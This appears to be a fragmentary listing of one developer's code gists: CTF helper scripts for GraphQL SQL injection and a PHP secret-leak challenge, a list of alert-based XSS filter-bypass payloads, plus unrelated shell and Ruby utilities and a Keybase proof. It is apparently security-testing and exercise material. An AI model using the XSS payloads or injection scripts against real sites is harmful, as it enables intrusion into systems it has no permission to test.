cianmce

MySQL Version

ruby generate_gql_mysql.rb \
  && time curl -X POST -H "Content-Type: application/json" -d @query.json https://gql-ctf-2.herokuapp.com/graphql.json > response.json \
  && ruby decode.rb

PostgreSQL Version

cianmce

echo "printenv-ing"
printenv
echo "done"
echo ""

cianmce

require 'securerandom'
require 'password_strength'
require 'benchmark'

def random_string(len)
  SecureRandom.base64(len)[0...len]
end


Benchmark.bm do |x|

cianmce

cianmce

<html>
  <script>
  var xsss = [
    '<script >alert("XSS - 1");</script >',
    '<script type="application/javascript">alert("XSS - 2");</script >',
    '<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >',
    '<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />',
    '<input type="image" src onerror="alert(\"XSS - 5\")">',
    '<object data="a.a" onerror="alert(\"XSS - 6\")" />',
    '<object data="a.a" onerror="alert(\"XSS - 7\")">',

cianmce

<html>
<script>
  /*
    Add GET param "msg" e.g. "?msg=Some message"
  */
  alert(decodeURI(location.href.split('?msg=')[1]));
</script>
</html>

cianmce

alert(document.currentScript.getAttribute('msg') || document.currentScript.getAttribute('src').split('msg=')[1] || "XSS!");

cianmce

<?php

/*
  Run using:
    SECRET="Some super secret text" php -S localhost:8000
  Goal:
    Find out what the SECRET env is
*/

if (empty($_POST['hmac']) || empty($_POST['host'])) {

cianmce

#!/bin/bash

# install by adding:
#   alias venv=". ~/location/venv.sh" 
# to .bashrc


help_string="venv [option] [VENV_NAME]
    VENV_NAME
        activates VENV_NAME is it exists

cianmce

Keybase proof

I hereby claim:

• I am cianmce on github.
• I am cianmce (https://keybase.io/cianmce) on keybase.
• I have a public key whose fingerprint is 95D8 378B 422A 8F0F 3585 749E 0CA9 E26E 2130 99FB

To claim this, I am signing this object: